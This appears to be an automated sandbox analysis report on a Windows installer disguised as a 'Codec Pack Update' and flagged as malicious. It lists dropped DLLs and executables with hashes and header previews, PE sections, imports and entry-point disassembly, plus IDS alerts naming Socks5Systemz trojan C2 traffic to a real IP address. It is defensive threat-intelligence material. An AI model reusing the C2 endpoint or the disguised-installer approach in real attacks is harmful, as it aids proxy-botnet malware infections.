                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):40974
                                                                        Entropy (8bit):6.485702128133584
                                                                        Encrypted:false
                                                                        SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                        MD5:F47E78AD658B2767461EA926060BF3DD
                                                                        SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                        SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                        SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):176200
                                                                        Entropy (8bit):6.647007817777345
                                                                        Encrypted:false
                                                                        SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                        MD5:6896DC57D056879F929206A0A7692A34
                                                                        SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                        SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                        SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):68552
                                                                        Entropy (8bit):6.1042544770100395
                                                                        Encrypted:false
                                                                        SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                        MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                        SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                        SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                        SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:InnoSetup Log Codec Pack Update, version 0x30, 4672 bytes, 098239\user, "C:\Users\user\AppData\Local\Codec Pack Update"
                                                                        Category:dropped
                                                                        Size (bytes):4672
                                                                        Entropy (8bit):4.69622146446918
                                                                        Encrypted:false
                                                                        SSDEEP:96:IjdWK38Xp/kOgVx9n+eOIhndI4cVSQs0LnVG:mdWK38p//WKHIhd9cVSQ1nM
                                                                        MD5:54A2A8875B4AD5973EC4D4483B48DFC3
                                                                        SHA1:E03CB590D75DECCDB02CC1F75A819D8AAF2ACBB5
                                                                        SHA-256:14330DA6216F8CD829AC3E871C4F321FB7828E4932C2D05BC759FB46F58B5DB3
                                                                        SHA-512:CF56FF46DE89B1773C3AB5C3F5F3E312AC9C4E80EC39957EA96B93E54D2EFFA7C59AE89C7B691524661AACF397FD7E1ADB6226A4E505EB2000EE686C27E39B53
                                                                        Malicious:false
                                                                        Preview:Inno Setup Uninstall Log (b)....................................Codec Pack Update...............................................................................................................Codec Pack Update...............................................................................................................0.......@...%.................................................................................................................".........Q..k......N....098239.user.C:\Users\user\AppData\Local\Codec Pack Update...........9.8.... .....1......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.d
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):704282
                                                                        Entropy (8bit):6.476111921428066
                                                                        Encrypted:false
                                                                        SSDEEP:12288:dhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpOA+u1nWXExydV:o/qrQ0yVrPg37AzHqA6Zfn0A3NWXExyL
                                                                        MD5:8FB0A35B2C5618B9AF54186692C1D885
                                                                        SHA1:317FD5BEE39CD02BC6229E437489ECF5C00424DD
                                                                        SHA-256:CD8F08AC8C519080D19CD9B8926A1B8061BF5ECB526E4A6DC3E7392149D29DF4
                                                                        SHA-512:DFA2328C202E37821E297BA6A25B44C958EACDA4191502BC255F819F6B2D0A845A248A6951EDC07E7AE36E6B6397B6025D06D8D0B164A01F96C56D0215646CF8
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Virustotal, Detection: 0%
                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................
                                                                        Process:C:\Users\user\Desktop\0RWRPBSuDx.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):693760
                                                                        Entropy (8bit):6.467804610296463
                                                                        Encrypted:false
                                                                        SSDEEP:12288:lhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpOA+u1nWXExyd:A/qrQ0yVrPg37AzHqA6Zfn0A3NWXExyd
                                                                        MD5:D8E53E1B8EA1B12BC3F40BB9F8B14F38
                                                                        SHA1:0A0D2B30DA9F9A7F92721AD517087AAA3FDB7278
                                                                        SHA-256:715726ACBFE23EC2E9651B187888C25BEA815CC49933A6CEF1E2110D07E736EB
                                                                        SHA-512:7DBE3AFF2FFD5EB5A424DBECCE6340CB304C7940CC9C758F441E00C485D301A7B74435689E26DB32CADDD66DB3DDC91CC76B008E1A4C5CE10FE2AC1A4437D947
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Virustotal, Detection: 0%
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):4096
                                                                        Entropy (8bit):4.026670007889822
                                                                        Encrypted:false
                                                                        SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                        MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                        SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                        SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                        SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 3%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2560
                                                                        Entropy (8bit):2.8818118453929262
                                                                        Encrypted:false
                                                                        SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                        MD5:A69559718AB506675E907FE49DEB71E9
                                                                        SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                        SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                        SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 1%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):6144
                                                                        Entropy (8bit):4.215994423157539
                                                                        Encrypted:false
                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                        MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                        SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                        SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                        SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                        Malicious:true
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):23312
                                                                        Entropy (8bit):4.596242908851566
                                                                        Encrypted:false
                                                                        SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                        MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                        SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                        SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                        SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.993652999413307
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        File name:0RWRPBSuDx.exe
                                                                        File size:1'954'271 bytes
                                                                        MD5:d19197438a7371baaac62fec8dabb3d7
                                                                        SHA1:3252c13b0af9e6a71c11bf9ed37122b3d76064bd
                                                                        SHA256:e2de4097b80b8480f28f08bc4fc238dca38dbdcb6bbb0c77a83e3753cb03dcf7
                                                                        SHA512:7cb352f821f9dfd2fb9dfb2d8b804943ba08e1f428334e79f529a2aed7b66966e5310433b74b6f2870c7e1868668f24a8aa74f475ede929aa3b2d1482e57c8a7
                                                                        SSDEEP:49152:32Y1stnLQ9SkGvzb4siA0Wz3048WUKlvhFKpde2MDmrfyoZ:mrtnfI50d8Wtviqmr6oZ
                                                                        TLSH:7C953311F9285738E0297B304D06F3AA8933F952EE35256CA78D9B6C4F77125C50AFA3
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                        Icon Hash:2d2e3797b32b2b99
                                                                        Entrypoint:0x409b24
                                                                        Entrypoint Section:CODE
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:1
                                                                        OS Version Minor:0
                                                                        File Version Major:1
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:1
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFC4h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor eax, eax
                                                                        mov dword ptr [ebp-10h], eax
                                                                        mov dword ptr [ebp-24h], eax
                                                                        call 00007FC2A4D25B57h
                                                                        call 00007FC2A4D26D5Eh
                                                                        call 00007FC2A4D28F89h
                                                                        call 00007FC2A4D28FD0h
                                                                        call 00007FC2A4D2B8C3h
                                                                        call 00007FC2A4D2BA2Ah
                                                                        xor eax, eax
                                                                        push ebp
                                                                        push 0040A1DBh
                                                                        push dword ptr fs:[eax]
                                                                        mov dword ptr fs:[eax], esp
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 0040A1A4h
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        mov eax, dword ptr [0040C014h]
                                                                        call 00007FC2A4D2C450h
                                                                        call 00007FC2A4D2BFB7h
                                                                        lea edx, dword ptr [ebp-10h]
                                                                        xor eax, eax
                                                                        call 00007FC2A4D295B9h
                                                                        mov edx, dword ptr [ebp-10h]
                                                                        mov eax, 0040CDE4h
                                                                        call 00007FC2A4D25C08h
                                                                        push 00000002h
                                                                        push 00000000h
                                                                        push 00000001h
                                                                        mov ecx, dword ptr [0040CDE4h]
                                                                        mov dl, 01h
                                                                        mov eax, 004072ECh
                                                                        call 00007FC2A4D29E48h
                                                                        mov dword ptr [0040CDE8h], eax
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 0040A15Ch
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        call 00007FC2A4D2C4C0h
                                                                        mov dword ptr [0040CDF0h], eax
                                                                        mov eax, dword ptr [0040CDF0h]
                                                                        cmp dword ptr [eax+0Ch], 01h
                                                                        jne 00007FC2A4D2C5FAh
                                                                        mov eax, dword ptr [0040CDF0h]
                                                                        mov edx, 00000028h
                                                                        call 00007FC2A4D2A249h
                                                                        mov edx, dword ptr [0040CDF0h]
                                                                        cmp eax, dword ptr [edx+00h]
                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                        CODE | 0x1000 | 0x9244 | 0x9400 | 00d95da090f9b045cc52199c7b36d118 | False | 0.6099820523648649 | data | 6.529731839731562 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        DATA | 0xb000 | 0x24c | 0x400 | 39d5f89b5ecafeb0fe902996045df0e7 | False | 0.3076171875 | data | 2.734702734719094 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        BSS | 0xc000 | 0xe48 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .reloc | 0x10000 | 0x8b4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .rsrc | 0x11000 | 0x2c00 | 0x2c00 | 3c05f08b670faa404567ceb461718a1c | False | 0.32279829545454547 | data | 4.462019412670872 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                        RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
                                                                        RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
                                                                        RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
                                                                        RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
                                                                        RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
                                                                        RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
                                                                        RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
                                                                        RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
                                                                        RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
                                                                        RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
                                                                        RT_RCDATA | 0x13010 | 0x2c | data | | | 1.2045454545454546
                                                                        RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
                                                                        RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States | 0.2764900662251656
                                                                        RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
                                                                        DLL | Import
                                                                        kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                        user32.dll | MessageBoxA
                                                                        oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                        advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                        kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                        user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                        comctl32.dll | InitCommonControls
                                                                        advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands |
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/29/24-12:59:10.764656 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49755 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:35.421196 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49787 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:59.675457 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49815 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:28.814022 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49778 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:58:58.279145 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49740 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:52.205310 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49806 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:48.200098 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49801 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:44.183959 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49796 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:29.458062 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49779 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:54.762452 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49810 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:25.184508 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49773 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:17.561359 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49763 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:32.211512 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49782 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:10.122007 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49754 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:21.394081 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49769 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:03.387980 | TCP | 2050112 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 49746 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:37.749118 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49790 | 80 | 192.168.2.4 | 45.142.214.240
03/29/24-12:59:24.138039 | TCP | 2049467 | ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 49772 | 80 | 192.168.2.4 | 45.142.214.240
